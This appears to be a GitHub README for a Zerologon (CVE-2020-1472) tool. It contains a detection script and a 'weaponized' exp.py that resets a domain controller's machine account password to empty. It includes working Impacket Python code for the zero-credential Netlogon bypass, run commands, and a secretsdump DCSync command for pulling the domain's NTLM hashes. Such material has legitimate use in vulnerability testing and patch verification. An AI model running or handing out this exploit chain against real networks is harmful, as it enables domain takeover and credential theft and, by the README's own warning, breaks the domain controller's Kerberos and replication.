
Scanner + Exploit PoC script for CVE-2020-1472

b4cktr4ck2/CVE-2020-1472

ZeroLogon testing script + Password Reset PoC

A Python script that uses the Impacket library to test whether a domain controller is vulnerable to Zerologon (CVE-2020-1472).

I've added a version of the scanner that performs a password reset should the scan be successful; that script is "exp.py".

The scanner attempts the Netlogon authentication bypass: it repeats the ServerReqChallenge/ServerAuthenticate3 handshake with an all-zero client challenge and an all-zero client credential, which an unpatched DC accepts for roughly one session key in 256. The script terminates immediately on a successful bypass and performs no further Netlogon operations over the resulting session. When a domain controller is patched, the detection script gives up after sending 2000 pairs of RPC calls and concludes the target is not vulnerable; the chance of a false negative against a vulnerable DC is (255/256)^2000, about 0.04%.
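The detection loop and its false-negative budget, as an added example that is not this repository's own code. The offline parts (the retry loop, the false-negative arithmetic, and a constructed stand-in DC) run as-is; `impacket_try_once` is the real per-attempt probe using Impacket's `nrpc` module and needs a reachable target. `dc_name`, `dc_ip`, and `accept_on` are caller-supplied illustrative values.

```python
"""Added example: the Zerologon detection loop and its false-negative budget."""
import math
from typing import Callable, Optional, Tuple

# On an unpatched DC the all-zero credential is accepted for about one session
# key in 256 (the first AES-CFB8 keystream byte under a zero IV must be 0x00).
SUCCESS_PROB = 1 / 256
MAX_ATTEMPTS = 2000                # budget the scanner uses before giving up
STATUS_ACCESS_DENIED = 0xC0000022  # normal rejection of a wrong credential


def false_negative_rate(max_attempts: int = MAX_ATTEMPTS) -> float:
    """Chance that a vulnerable DC rejects every one of max_attempts tries."""
    return (1 - SUCCESS_PROB) ** max_attempts


def attempts_for_confidence(max_fn_rate: float) -> int:
    """Smallest attempt budget whose false-negative rate is at most max_fn_rate."""
    return math.ceil(math.log(max_fn_rate) / math.log(1 - SUCCESS_PROB))


def scan(try_once: Callable[[], bool], max_attempts: int = MAX_ATTEMPTS) -> Tuple[bool, int]:
    """Repeat the zero-credential handshake until accepted or the budget is spent.

    try_once() returns True if the DC accepted the all-zero credential
    (vulnerable) and False if it answered STATUS_ACCESS_DENIED.
    Returns (vulnerable, attempts_made); stops at the first success and never
    uses the resulting session.
    """
    for attempt in range(1, max_attempts + 1):
        if try_once():
            return True, attempt
    return False, max_attempts


def impacket_try_once(dc_name: str, dc_ip: str) -> Callable[[], bool]:
    """Real per-attempt probe over Netlogon RPC with Impacket (needs a network target).

    dc_name is the DC's NetBIOS name and dc_ip its address (caller-supplied).
    Each call opens a fresh bind so the DC derives a new session key, sends an
    all-zero client challenge, then an all-zero client credential with
    negotiate flags that leave signing/sealing off.
    """
    from impacket.dcerpc.v5 import epm, nrpc, transport  # lazy: offline callers never need it

    dc_handle = "\\\\" + dc_name

    def try_once() -> bool:
        binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol="ncacn_ip_tcp")
        rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
        rpc_con.connect()
        rpc_con.bind(nrpc.MSRPC_UUID_NRPC)
        zeros = b"\x00" * 8
        try:
            nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + "\x00", dc_name + "\x00", zeros)
            resp = nrpc.hNetrServerAuthenticate3(
                rpc_con, dc_handle + "\x00", dc_name + "$\x00",
                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                dc_name + "\x00", zeros, 0x212FFFFF,
            )
            return resp["ErrorCode"] == 0
        except nrpc.DCERPCSessionError as ex:
            if ex.get_error_code() == STATUS_ACCESS_DENIED:
                return False  # expected; next call gets a new session key
            raise             # anything else (e.g. a wrong NetBIOS name) is a real failure
        finally:
            rpc_con.disconnect()

    return try_once


def simulated_dc(accept_on: Optional[int]) -> Callable[[], bool]:
    """Offline stand-in (constructed): accepts on call number accept_on, never if None."""
    calls = 0

    def try_once() -> bool:
        nonlocal calls
        calls += 1
        return accept_on is not None and calls == accept_on

    return try_once


if __name__ == "__main__":
    print(f"false negatives with {MAX_ATTEMPTS} attempts: {false_negative_rate():.2%}")
    print("vulnerable lab DC:", scan(simulated_dc(accept_on=300)))
    print("patched DC:", scan(simulated_dc(accept_on=None)))
```

Against a real target you would pass `impacket_try_once("EXAMPLE-DC", "1.2.3.4")` to `scan`; the stand-in exists so the loop and the budget arithmetic can be checked without a domain controller. `attempts_for_confidence` is the inverse of the 2000-attempt figure: it tells you how many attempts buy a given false-negative rate.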

Installation

Requires Python 3.7 or higher and Pip. Install dependencies as follows:

pip install -r requirements.txt

Note that running pip install impacket should work as well, as long as the script is not broken by future Impacket versions.

Running the script

The script can be used to target a DC or backup DC. It likely also works against a read-only DC, but this has not been tested. Given a domain controller named EXAMPLE-DC with IP address 1.2.3.4, run the script as follows:

./zerologon_tester.py EXAMPLE-DC 1.2.3.4

The weaponized script can be run as follows:

./exp.py EXAMPLE-DC 1.2.3.4

If you see a success message, you can perform a DCSync Attack like so:

secretsdump.py -just-dc-ntlm "domain.local/EXAMPLE-DC\$@1.2.3.4"

You should be able to just hit "Enter" when prompted for the password: the exploit has reset the DC's machine account (EXAMPLE-DC$) password in Active Directory to an empty string, which is why secretsdump can authenticate as that account.

Tested on Parrot OS against a Windows Server 2012 R2 machine.

NOTE: THIS WILL BREAK THINGS. YOU ARE CHANGING THE MACHINE ACCOUNT PASSWORD TO A DOMAIN CONTROLLER ARBITRARILY. The DC's own locally stored copy of that password is not updated, so the DC no longer matches what AD holds and Kerberos and replication for it break until the original password is restored; do not run exp.py outside a lab without a recovery plan.

The DC name should be its NetBIOS computer name. If this name is not correct, the script will likely fail with a STATUS_INVALID_COMPUTER_NAME error.
